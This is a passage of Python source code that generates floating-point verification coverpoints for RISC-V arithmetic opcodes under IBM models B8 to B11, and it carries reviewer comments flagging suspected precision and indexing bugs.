        # combination j, encoded as appended mantissa digits.
        for k in range(len(ieee754_num)):
            for i in range(1,4):
                for j in range(1,8):
                    grs = '{:03b}'.format(j)
                    ir_dataset.append([ieee754_num[k].split('p')[0]+hex(int('{:03b}'.format(j)+19*'0'+'{:02b}'.format(i),2))[2:]+'p'+ieee754_num[k].split('p')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Mask On Extra Bits: '+19*'0'+'{:02b}'.format(i)])
                    ir_dataset.append([ieee754_num[k].split('p')[0]+hex(int('{:03b}'.format(j)+19*'1'+'{:02b}'.format(i),2))[2:]+'p'+ieee754_num[k].split('p')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Mask On Extra Bits: '+19*'1'+'{:02b}'.format(i)])
        n = len(ir_dataset)
        for i in range(n):
            ir_dataset[i][0] = float.fromhex(ir_dataset[i][0])
    elif flen == 64:
        # NOTE(review): maxdec is assigned but never used in this branch.
        maxdec = '1.7976931348623157e+308'
        maxnum = float.fromhex('0x1.fffffffffffffp+1023')
        ieee754_num = []
        for i in dsubnorm+dnorm:
            float_val = float.hex(fields_dec_converter(64,i))
            if float_val[0] != '-':
                ieee754_num.append(float_val.split('p')[0][0:17]+'p'+float_val.split('p')[1])
        ir_dataset = []
        # NOTE(review): this branch hard-codes the GRS bits as '010' while the
        # comment string still reports grs derived from j (the flen==32 branch
        # encodes '{:03b}'.format(j)); comment and encoded bits may disagree
        # here -- confirm against the flen==32 branch.
        for k in range(len(ieee754_num)):
            for i in range(1,4):
                for j in range(1,8):
                    grs = '{:03b}'.format(j)
                    ir_dataset.append([ieee754_num[k].split('p')[0]+hex(int('010'+19*'0'+'{:02b}'.format(i),2))[2:]+'p'+ieee754_num[k].split('p')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Mask On Extra Bits: '+19*'0'+'{:02b}'.format(i)])
                    ir_dataset.append([ieee754_num[k].split('p')[0]+hex(int('010'+19*'1'+'{:02b}'.format(i),2))[2:]+'p'+ieee754_num[k].split('p')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Mask On Extra Bits: '+19*'1'+'{:02b}'.format(i)])
        n = len(ir_dataset)
        for i in range(n):
            ir_dataset[i][0] = float.fromhex(ir_dataset[i][0])
    # Deterministic per-opcode default seeds keep generation reproducible.
    if seed == -1:
        if opcode in 'fadd':
            random.seed(0)
        elif opcode in 'fsub':
            random.seed(1)
        elif opcode in 'fmul':
            random.seed(2)
        elif opcode in 'fdiv':
            random.seed(3)
        elif opcode in 'fsqrt':
            random.seed(4)
        elif opcode in 'fmadd':
            random.seed(5)
        elif opcode in 'fnmadd':
            random.seed(6)
        elif opcode in 'fmsub':
            random.seed(7)
        elif opcode in 'fnmsub':
            random.seed(8)
    else:
        random.seed(seed)
    # Back-solve rs2 so rs1 {op} rs2 hits each target IR. Unlike B5/B7, rs1 and
    # rs3 are drawn from (1, target) rather than (1, maxnum).
    b8_comb = []
    for i in range(len(ir_dataset)):
        rs1 = random.uniform(1,ir_dataset[i][0])
        rs3 = random.uniform(1,ir_dataset[i][0])
        if opcode in 'fadd':
            if flen == 32:
                rs2 = ir_dataset[i][0] - rs1
            elif flen == 64:
                rs2 = Decimal(ir_dataset[i][0]) - Decimal(rs1)
        elif opcode in 'fsub':
            if flen == 32:
                rs2 = rs1 - ir_dataset[i][0]
            elif flen == 64:
                rs2 = Decimal(rs1) - Decimal(ir_dataset[i][0])
        elif opcode in 'fmul':
            if flen == 32:
                rs2 = ir_dataset[i][0]/rs1
            elif flen == 64:
                rs2 = Decimal(ir_dataset[i][0])/Decimal(rs1)
        elif opcode in 'fdiv':
            if flen == 32:
                rs2 = rs1/ir_dataset[i][0]
            elif flen == 64:
                rs2 = Decimal(rs1)/Decimal(ir_dataset[i][0])
        elif opcode in 'fsqrt':
            if flen == 32:
                rs2 = ir_dataset[i][0]*ir_dataset[i][0]
            elif flen == 64:
                rs2 = Decimal(ir_dataset[i][0])*Decimal(ir_dataset[i][0])
        elif opcode in 'fmadd':
            if flen == 32:
                rs2 = (ir_dataset[i][0] - rs3)/rs1
            elif flen == 64:
                rs2 = (Decimal(ir_dataset[i][0]) - Decimal(rs3))/Decimal(rs1)
        elif opcode in 'fnmadd':
            if flen == 32:
                rs2 = (rs3 - ir_dataset[i][0])/rs1
            elif flen == 64:
                rs2 = (Decimal(rs3) - Decimal(ir_dataset[i][0]))/Decimal(rs1)
        elif opcode in 'fmsub':
            if flen == 32:
                rs2 = (ir_dataset[i][0] + rs3)/rs1
            elif flen == 64:
                rs2 = (Decimal(ir_dataset[i][0]) + Decimal(rs3))/Decimal(rs1)
        elif opcode in 'fnmsub':
            if flen == 32:
                rs2 = -1*(rs3 + ir_dataset[i][0])/rs1
            elif flen == 64:
                rs2 = -1*(Decimal(rs3) + Decimal(ir_dataset[i][0]))/Decimal(rs1)
        # NOTE(review): x1/x2/x3 are computed but never used afterwards.
        if(flen==32):
            x1 = struct.unpack('f', struct.pack('f', rs1))[0]
            x2 = struct.unpack('f', struct.pack('f', rs2))[0]
            x3 = struct.unpack('f', struct.pack('f', rs3))[0]
        elif(flen==64):
            x1 = rs1
            x2 = rs2
            x3 = rs3
        # Record the operand tuple in IEEE754 hex; arity depends on the opcode.
        if opcode in ['fadd','fsub','fmul','fdiv']:
            b8_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
        elif opcode in 'fsqrt':
            b8_comb.append((floatingPoint_tohex(flen,float(rs2)),))
        elif opcode in ['fmadd','fnmadd','fmsub','fnmsub']:
            b8_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2)),floatingPoint_tohex(flen,float(rs3))))
    # Emit one coverpoint per operand tuple per rounding mode (rm 0-4).
    coverpoints = []
    k=0
    for c in b8_comb:
        for rm in range(5):
            cvpt = ""
            for x in range(1, ops+1):
                # cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
                cvpt += (extract_fields(flen,c[x-1],str(x)))
                cvpt += " and "
            cvpt += 'rm_val == '+str(rm)
            cvpt += ' # '
            for y in range(1, ops+1):
                cvpt += 'rs'+str(y)+'_val=='
                cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
                if(y != ops):
                    cvpt += " and "
            cvpt += ir_dataset[k][1]
            coverpoints.append(cvpt)
        k=k+1
    mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
        (str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B8 for '+opcode+' !'
    logger.info(mess)
    coverpoints = comments_parser(coverpoints)
    return coverpoints
def ibm_b9(flen, opcode, ops):
    '''
    IBM Model B9 Definition:
        This model tests special patterns in the significands of the input operands. Each
        of the input operands should contain one of the following patterns (each
        sequence can be of length 0 up to the number of bits in the significand - the
        more interesting cases will be chosen).

        1. A sequence of leading zeroes
        2. A sequence of leading ones
        3. A sequence of trailing zeroes
        4. A sequence of trailing ones
        5. A small number of 1s as compared to 0s
        6. A small number of 0s as compared to 1s
        7. A "checkerboard" pattern (for example 00110011... or 011011011...)
        8. Long sequences of 1s
        9. Long sequences of 0s

    :param flen: Size of the floating point registers
    :param opcode: Opcode for which the coverpoints are to be generated
    :param ops: No. of Operands taken by the opcode

    :type flen: int
    :type opcode: str
    :type ops: int

    Abstract Dataset Description:
        Operand1, Operand2 ∈ [A sequence of leading zeroes, A sequence of leading ones, A sequence of trailing zeroes, A sequence of trailing ones, A small number of 1s as compared to 0s, A small number of 0s as compared to 1s, A "checkerboard" pattern (for example 00110011... or 011011011...), Long sequences of 1s, Long sequences of 0s]

    Implementation:
        - The rs1 array is appended with the elements of flip types and then for each iteration, the respective sign, mantissa and exponent is computed.
        - A nested loop is initialized, assuming the rs1 mantissa as the base number and rs2 sign and rs2 exponent is obtained directly from the rs1 sign and rs1 exponent. Rs2 mantissa is calculated per repeating pattern.
        - The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
        - Coverpoints are then appended with rounding mode 0 for that particular opcode.
    '''
    opcode = opcode.split('.')[0]
    if flen == 32:
        flip_types = fzero + fone + fminsubnorm + fmaxsubnorm + fminnorm + fmaxnorm
        e_sz = 8
    elif flen == 64:
        flip_types = dzero + done + dminsubnorm + dmaxsubnorm + dminnorm + dmaxnorm
        e_sz = 11

    def _compose(sgn, exp, man):
        # Rebuild a float value from its sign/exponent/mantissa bit strings.
        # BUGFIX: the width argument to fields_dec_converter was previously
        # hard-coded to 32, which mis-decoded the flen-bit pattern when
        # flen == 64; pass flen instead (consistent with ibm_b11).
        return fields_dec_converter(flen, '0x' + hex(int('1' + sgn + exp + man, 2))[3:])

    rs1 = []
    b9_comb = []
    comment = []
    if ops == 2:
        for i in range(len(flip_types)):
            rs1.append(flip_types[i])

        def _append_pair(man, desc):
            # Record the (rs1, pattern) pair in both operand orders, with a
            # matching human-readable comment for each.
            val_hex = floatingPoint_tohex(flen, _compose(rs2_sgn, rs2_exp, man))
            b9_comb.append((rs1[i], val_hex))
            comment.append(' | ' + desc + ' ---> rs2_man = ' + man)
            b9_comb.append((val_hex, rs1[i]))
            comment.append(' | ' + desc + ' ---> rs1_man = ' + man)

        for i in range(len(rs1)):
            # '1' prefix keeps leading zeroes when converting hex -> binary.
            bin_val = bin(int('1' + rs1[i][2:], 16))[3:]
            rs1_sgn = bin_val[0]
            rs1_exp = bin_val[1:e_sz + 1]
            rs1_man = bin_val[e_sz + 1:]
            man_len = len(rs1_man)
            for j in range(man_len):
                rs2_sgn = rs1_sgn
                rs2_exp = rs1_exp
                _append_pair('0' * j + rs1_man[j:], 'Leading zeroes')
                _append_pair('1' * j + '0' * (man_len - j), 'Leading ones')
                _append_pair(rs1_man[0:j] + '0' * (man_len - j), 'Trailing zeroes')
                _append_pair('0' * j + '1' * (man_len - j), 'Trailing ones')
            # Only the last ~10% of split positions: long runs of a single bit.
            for j in range(man_len - math.ceil(0.1 * man_len), man_len):
                rs2_sgn = rs1_sgn
                rs2_exp = rs1_exp
                _append_pair('1' * j + '0' * (man_len - j), 'Long sequence of ones')
                _append_pair('0' * j + '1' * (man_len - j), 'Long sequence of zeroes')
            chkrbrd = ['011', '110', '0011', '1100', '0111', '1000', '010', '101', '0110', '1001']
            for pat in chkrbrd:
                rs2_sgn = rs1_sgn
                rs2_exp = rs1_exp
                rs2_man = pat
                for k in range(math.ceil(man_len / len(pat))):
                    rs2_man += pat
                # Truncate the repeated pattern to the mantissa width.
                _append_pair(rs2_man[0:flen - e_sz - 1], 'Checkerboard pattern')
    else:
        for i in range(len(flip_types)):
            rs1.append(flip_types[i])

        def _append_single(man, desc):
            # Single-operand form: record only the generated pattern value.
            b9_comb.append((floatingPoint_tohex(flen, _compose(rs2_sgn, rs2_exp, man)),))
            comment.append(' | ' + desc + ' ---> rs1_man = ' + man)

        for i in range(len(rs1)):
            bin_val = bin(int('1' + rs1[i][2:], 16))[3:]
            rs1_sgn = bin_val[0]
            rs1_exp = bin_val[1:e_sz + 1]
            rs1_man = bin_val[e_sz + 1:]
            man_len = len(rs1_man)
            if rs1_sgn != '1':
                # Skip negative bases for single-operand opcodes.
                for j in range(man_len):
                    rs2_sgn = rs1_sgn
                    rs2_exp = rs1_exp
                    _append_single('0' * j + rs1_man[j:], 'Leading zeroes')
                    _append_single('1' * j + '0' * (man_len - j), 'Leading ones')
                    _append_single(rs1_man[0:j] + '0' * (man_len - j), 'Trailing zeroes')
                    _append_single('0' * j + '1' * (man_len - j), 'Trailing ones')
            rs1_sgn = '0'
            for j in range(flen - e_sz - 1 - math.ceil(0.1 * (flen - e_sz - 1)), flen - e_sz - 1):
                rs2_sgn = rs1_sgn
                rs2_exp = rs1_exp
                _append_single('1' * j + '0' * (man_len - j), 'Long sequence of ones')
                _append_single('0' * j + '1' * (man_len - j), 'Long sequence of zeroes')
            chkrbrd = ['011', '110', '0011', '1100', '0111', '1000', '010', '101', '0110', '1001']
            for pat in chkrbrd:
                rs2_sgn = rs1_sgn
                rs2_exp = rs1_exp
                rs2_man = pat
                for k in range(math.ceil(man_len / len(pat))):
                    rs2_man += pat
                _append_single(rs2_man[0:flen - e_sz - 1], 'Checkerboard pattern')
    coverpoints = []
    k = 0
    for c in b9_comb:
        cvpt = ""
        for x in range(1, ops + 1):
            # cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
            cvpt += (extract_fields(flen, c[x - 1], str(x)))
            cvpt += " and "
        cvpt += 'rm_val == 0'
        cvpt += ' # '
        for y in range(1, ops + 1):
            cvpt += 'rs' + str(y) + '_val=='
            cvpt += num_explain(flen, c[y - 1]) + '(' + str(c[y - 1]) + ')'
            if(y != ops):
                cvpt += " and "
        cvpt += comment[k]
        coverpoints.append(cvpt)
        k += 1
    mess = 'Generated' + (' ' * (5 - len(str(len(coverpoints))))) + str(len(coverpoints)) + ' ' + \
        (str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B9 for ' + opcode + ' !'
    logger.info(mess)
    coverpoints = comments_parser(coverpoints)
    return coverpoints
def ibm_b10(flen, opcode, ops, N=-1, seed=-1):
    '''
    IBM Model B10 Definition:
        This model tests every possible value for a shift between the input operands.

        1. A value smaller than -(p + 4)
        2. All the values in the range [-(p + 4) , (p + 4)]
        3. A value larger than (p + 4)

    :param flen: Size of the floating point registers
    :param opcode: Opcode for which the coverpoints are to be generated
    :param ops: No. of Operands taken by the opcode
    :param N: No. of sets of coverpoints to be generated. (Predefined to -1. Set to 2)
    :param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)

    :type flen: int
    :type opcode: str
    :type ops: int
    :type N: int
    :type seed: int

    Abstract Dataset Description:
        Operand1 = [Random Number]
        Operand2 = [A value smaller than -(op1.exp+4), All values in the range [-(op1.exp+4), (op1.exp+4)], A value larger than +(op1.exp+4)]

    Implementation:
        - The exponent values of operand 1 and operand 2 obey the shift defined above. The mantissa value is randomly chosen and appended with the exponent derived.
        - Simultaneously, we convert these numbers into their corresponding IEEE754 floating point formats.
        - These operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
        - Coverpoints are then appended with rounding mode 0 for that particular opcode.
    '''
    opcode = opcode.split('.')[0]
    if flen == 32:
        ieee754_maxnorm = '0x1.7fffffp+127'
        maxnum = float.fromhex(ieee754_maxnorm)
        exp_max = 255
    elif flen == 64:
        # (an unused `maxdec` string literal previously assigned here was removed)
        maxnum = float.fromhex('0x1.fffffffffffffp+1023')
        exp_max = 1023
    if N == -1:
        N = 2
    # Deterministic per-opcode seeding keeps generated coverpoints reproducible.
    if seed == -1:
        if opcode in 'fadd':
            random.seed(0)
        elif opcode in 'fsub':
            random.seed(1)
    else:
        random.seed(seed)
    b10_comb = []
    comment = []
    for i in range(1, N):
        rs1 = random.uniform(1, maxnum/1000)
        rs2 = random.uniform(1, maxnum/1000)
        # NOTE(review): assumes str(rs1) uses scientific notation (contains
        # 'e'); draws below ~1e16 render without an exponent and would raise
        # IndexError here -- TODO confirm the intended value range.
        rs1_exp = str(rs1).split('e')[1]
        # Case 1: a shift smaller than -(p + 4).
        rs2_exp = -1*random.randrange(int(math.log(pow(10, int(rs1_exp)), 2))+4, exp_max)
        rs2_num = str(rs2).split('e')[0] + 'e' + str(int(math.log(pow(2, int(rs2_exp)), 10)))
        b10_comb.append((floatingPoint_tohex(flen, float(rs1)), floatingPoint_tohex(flen, float(rs2_num))))
        comment.append(' | Exponent = '+ str(rs2_exp) + ' --> A value smaller than -(p + 4)')
        # Case 2: every shift value in [-(p + 4), (p + 4)].
        for j in range(-(int(math.log(pow(10, int(rs1_exp)), 2))+4), +(int(math.log(pow(10, int(rs1_exp)), 2))+4)):
            rs2_num = str(rs2).split('e')[0] + 'e' + str(int(math.log(pow(2, int(j)), 10)))
            b10_comb.append((floatingPoint_tohex(flen, float(rs1)), floatingPoint_tohex(flen, float(rs2_num))))
            comment.append(' | Exponent = '+ str(j) + ' --> Values in the range [-(p + 4) , (p + 4)]')
        # Case 3: a shift larger than (p + 4).
        rs2_exp = random.randrange(int(math.log(pow(10, int(rs1_exp)), 2))+4, exp_max)
        rs2_num = str(rs2).split('e')[0] + 'e' + str(int(math.log(pow(2, int(rs2_exp)), 10)))
        b10_comb.append((floatingPoint_tohex(flen, float(rs1)), floatingPoint_tohex(flen, float(rs2_num))))
        comment.append(' | Exponent = '+ str(rs2_exp) + ' --> A value larger than (p + 4)')
    coverpoints = []
    k = 0
    for c in b10_comb:
        cvpt = ""
        for x in range(1, ops+1):
            # cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
            cvpt += (extract_fields(flen, c[x-1], str(x)))
            cvpt += " and "
        cvpt += 'rm_val == 0'
        cvpt += ' # '
        for y in range(1, ops+1):
            cvpt += 'rs'+str(y)+'_val=='
            cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
            if(y != ops):
                cvpt += " and "
        cvpt += comment[k]
        coverpoints.append(cvpt)
        k += 1
    mess = 'Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
        (str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B10 for '+opcode+' !'
    logger.info(mess)
    coverpoints = comments_parser(coverpoints)
    return coverpoints
def ibm_b11(flen, opcode, ops, N=-1, seed=-1):
    '''
    IBM Model B11 Definition:
        In this model we test the combination of different shift values between the
        inputs, with special patterns in the significands of the inputs.
        Significands of Input1 and Input2: as in model (B9) "Special Significands on
        Inputs"
        Shift: as in model (B10) "Shift - Add"
        We test both effective operations: addition and subtraction.

    :param flen: Size of the floating point registers
    :param opcode: Opcode for which the coverpoints are to be generated
    :param ops: No. of Operands taken by the opcode
    :param N: Unused in this model; accepted for signature parity with the other models.
    :param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)

    :type flen: int
    :type opcode: str
    :type ops: int
    :type N: int
    :type seed: int

    Abstract Dataset Description:
        Operand1, Operand2 ∈ Abstract Dataset in B9 + Abstract Dataset in B10

    Implementation:
        - A culmination of the techniques used in the implementations of Model B9 and Model B10 are used to form the dataset.
        - The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
        - Coverpoints are then appended with rounding mode 0 for that particular opcode.
    '''
    opcode = opcode.split('.')[0]
    if flen == 32:
        flip_types = fzero + fone + fminsubnorm + fmaxsubnorm + fminnorm + fmaxnorm
        e_sz=8
        exp_max = 255
    elif flen == 64:
        flip_types = dzero + done + dminsubnorm + dmaxsubnorm + dminnorm + dmaxnorm
        e_sz=11
        exp_max = 1023
    # NOTE(review): exp_max is assigned above but never used below; the
    # exponent arithmetic in this function hard-codes single-precision bias
    # constants (127, 131, 250, 123) even when flen == 64 (bias 1023) -- this
    # looks wrong for double precision, TODO confirm against the B11 spec.
    # Deterministic per-opcode seeding keeps generated coverpoints reproducible.
    if seed == -1:
        if opcode in 'fadd':
            random.seed(0)
        elif opcode in 'fsub':
            random.seed(1)
    else:
        random.seed(seed)
    rs1 = []
    b11_comb = []
    comment = []
    if ops == 2:
        for i in range(len(flip_types)):
            rs1.append(flip_types[i])
        for i in range(len(rs1)):
            # '1' prefix preserves leading zeroes in the hex -> binary conversion.
            bin_val = bin(int('1'+rs1[i][2:],16))[3:]
            rs1_sgn = bin_val[0]
            rs1_exp = bin_val[1:e_sz+1]
            rs1_man = bin_val[e_sz+1:]
            # Shift case 1: rs2 exponent well below rs1's (unbiased, assumes bias 127).
            if int(rs1_exp,2) < 4: rs2_exp = -127
            else : rs2_exp = random.randrange(-127,int(rs1_exp,2)-131)
            comment_str = ' | Exponent = '+ str(rs2_exp) + ' --> A value smaller than (p - 4)'
            rs2_exp += 127
            if flen == 32: rs2_exp = '{:08b}'.format(rs2_exp)
            elif flen == 64: rs2_exp = '{:011b}'.format(rs2_exp)
            # B9-style significand patterns at this shift, in both operand orders.
            for j in range(len(rs1_man)):
                rs2_sgn = rs1_sgn
                rs2_man = '0'*j + rs1_man[j:]  # Leading 0s
                rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
                comment.append(comment_str + ' | Leading zeroes ---> rs2_man = '+rs2_man)
                b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
                comment.append(comment_str + ' | Leading zeroes ---> rs1_man = '+rs2_man)
                rs2_man = '1'*j + '0'*(len(rs1_man)-j)  # Leading 1s
                rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
                comment.append(comment_str + ' | Leading ones ---> rs2_man = '+rs2_man)
                b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
                comment.append(comment_str + ' | Leading ones ---> rs1_man = '+rs2_man)
                rs2_man = rs1_man[0:j] + '0'*(len(rs1_man)-j)  # Trailing 0s
                rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
                comment.append(comment_str + ' | Trailing zeroes ---> rs2_man = '+rs2_man)
                b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
                comment.append(comment_str + ' | Trailing zeroes ---> rs1_man = '+rs2_man)
                rs2_man = '0'*j + '1'*(len(rs1_man)-j)  # Trailing 1s
                rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
                comment.append(comment_str + ' | Trailing ones ---> rs2_man = '+rs2_man)
                b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
                comment.append(comment_str + ' | Trailing ones ---> rs1_man = '+rs2_man)
            # NOTE(review): the long-sequence and checkerboard branches below
            # reset rs2_exp back to rs1_exp, yet comment_str still reports the
            # shifted exponent -- possibly intentional, TODO confirm.
            for j in range(len(rs1_man)-math.ceil(0.1*len(rs1_man)),len(rs1_man)):
                rs2_sgn = rs1_sgn
                rs2_exp = rs1_exp
                rs2_man = '1'*j + '0'*(len(rs1_man)-j)  # Long sequence of 1s
                rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
                comment.append(comment_str + ' | Long sequence of ones ---> rs2_man = '+rs2_man)
                b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
                comment.append(comment_str + ' | Long sequence of ones ---> rs1_man = '+rs2_man)
                rs2_man = '0'*j + '1'*(len(rs1_man)-j)  # Long sequence of 0s
                rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
                comment.append(comment_str + ' | Long sequence of zeroes ---> rs2_man = '+rs2_man)
                b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
                comment.append(comment_str + ' | Long sequence of zeroes ---> rs1_man = '+rs2_man)
            chkrbrd = ['011','110','0011','1100','0111','1000','010','101','0110','1001']
            for j in chkrbrd:
                rs2_sgn = rs1_sgn
                rs2_exp = rs1_exp
                rs2_man = j
                for k in range(math.ceil(len(rs1_man)/len(j))):
                    rs2_man += j
                # Truncate the repeated pattern to the mantissa width.
                rs2_man = rs2_man[0:flen-e_sz-1]
                rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
                comment.append(comment_str + ' | Checkerboard pattern ---> rs2_man = '+rs2_man)
                b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
                comment.append(comment_str + ' | Checkerboard pattern ---> rs1_man = '+rs2_man)
            # Shift case 2: rs2 exponent well above rs1's.
            if int(rs1_exp,2) >= 250: rs2_exp = 127
            else : rs2_exp = random.randrange(int(rs1_exp,2)-123,127)
            comment_str = ' | Exponent = '+ str(rs2_exp) + ' --> A value greater than (p + 4)'
            rs2_exp += 127
            if flen == 32: rs2_exp = '{:08b}'.format(rs2_exp)
            elif flen == 64: rs2_exp = '{:011b}'.format(rs2_exp)
            for j in range(len(rs1_man)):
                rs2_sgn = rs1_sgn
                rs2_man = '0'*j + rs1_man[j:]  # Leading 0s
                rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
                comment.append(comment_str + ' | Leading zeroes ---> rs2_man = '+rs2_man)
                b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
                comment.append(comment_str + ' | Leading zeroes ---> rs1_man = '+rs2_man)
                rs2_man = '1'*j + '0'*(len(rs1_man)-j)  # Leading 1s
                rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
                comment.append(comment_str + ' | Leading ones ---> rs2_man = '+rs2_man)
                b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
                comment.append(comment_str + ' | Leading ones ---> rs1_man = '+rs2_man)
                rs2_man = rs1_man[0:j] + '0'*(len(rs1_man)-j)  # Trailing 0s
                rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
                comment.append(comment_str + ' | Trailing zeroes ---> rs2_man = '+rs2_man)
                b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
                comment.append(comment_str + ' | Trailing zeroes ---> rs1_man = '+rs2_man)
                rs2_man = '0'*j + '1'*(len(rs1_man)-j)  # Trailing 1s
                rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
                comment.append(comment_str + ' | Trailing ones ---> rs2_man = '+rs2_man)
                b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
                comment.append(comment_str + ' | Trailing ones ---> rs1_man = '+rs2_man)
            for j in range(len(rs1_man)-math.ceil(0.1*len(rs1_man)),len(rs1_man)):
                rs2_sgn = rs1_sgn
                rs2_exp = rs1_exp
                rs2_man = '1'*j + '0'*(len(rs1_man)-j)  # Long sequence of 1s
                rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
                comment.append(comment_str + ' | Long sequence of ones ---> rs2_man = '+rs2_man)
                b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
                comment.append(comment_str + ' | Long sequence of ones ---> rs1_man = '+rs2_man)
                rs2_man = '0'*j + '1'*(len(rs1_man)-j)  # Long sequence of 0s
                rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
                comment.append(comment_str + ' | Long sequence of zeroes ---> rs2_man = '+rs2_man)
                b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
                comment.append(comment_str + ' | Long sequence of zeroes ---> rs1_man = '+rs2_man)
            chkrbrd = ['011','110','0011','1100','0111','1000','010','101','0110','1001']
            for j in chkrbrd:
                rs2_sgn = rs1_sgn
                rs2_exp = rs1_exp
                rs2_man = j
                for k in range(math.ceil(len(rs1_man)/len(j))):
                    rs2_man += j
                rs2_man = rs2_man[0:flen-e_sz-1]
                rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
                comment.append(comment_str + ' | Checkerboard pattern ---> rs2_man = '+rs2_man)
                b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
                comment.append(comment_str + ' | Checkerboard pattern ---> rs1_man = '+rs2_man)
            # Shift case 3: every rs2 exponent in the window around rs1's exponent,
            # clamped to the representable (single-precision) range.
            ul = int(rs1_exp,2)-123
            ll = int(rs1_exp,2)-131
            if int(rs1_exp,2) >= 250: ul = 127
            if int(rs1_exp,2) < 4: ll = -127
            for expval in range (ll, ul):
                rs2_exp = expval
                comment_str = ' | Exponent = '+ str(rs2_exp) + ' --> Values in the range (p - 4) to (p + 4)'
                rs2_exp += 127
                if flen == 32: rs2_exp = '{:08b}'.format(rs2_exp)
                elif flen == 64: rs2_exp = '{:011b}'.format(rs2_exp)
                for j in range(len(rs1_man)):
                    rs2_sgn = rs1_sgn
                    rs2_man = '0'*j + rs1_man[j:]  # Leading 0s
                    rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                    b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
                    comment.append(comment_str + ' | Leading zeroes ---> rs2_man = '+rs2_man)
                    b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
                    comment.append(comment_str + ' | Leading zeroes ---> rs1_man = '+rs2_man)
                    rs2_man = '1'*j + '0'*(len(rs1_man)-j)  # Leading 1s
